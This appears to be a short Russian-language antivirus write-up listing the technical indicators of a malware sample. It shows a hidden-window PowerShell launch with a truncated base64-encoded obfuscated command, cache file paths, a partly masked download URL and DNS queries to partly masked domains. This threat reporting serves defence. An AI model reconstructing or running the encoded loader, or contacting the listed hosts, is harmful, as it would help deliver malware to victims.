Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGgAXwBfAG8AegBtAD0AKAAnAFkAJwArACcANgBqAG0AJwArACcAagBqAGQAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUATQBwAFwAbwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://sh###omela.com/sjwt9/glzfny3k0366/
- DNS ASK bo###argo.id
- DNS ASK hu##do.pl
- DNS ASK gp###lobal.com
- DNS ASK ma####hosting.info
- DNS ASK sh###omela.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGgAXwBfAG8AegBtAD0AKAAnAFkAJwArACcANgBqAG0AJwArACcAagBqAGQAJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUATQBwAFwAbwBmAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)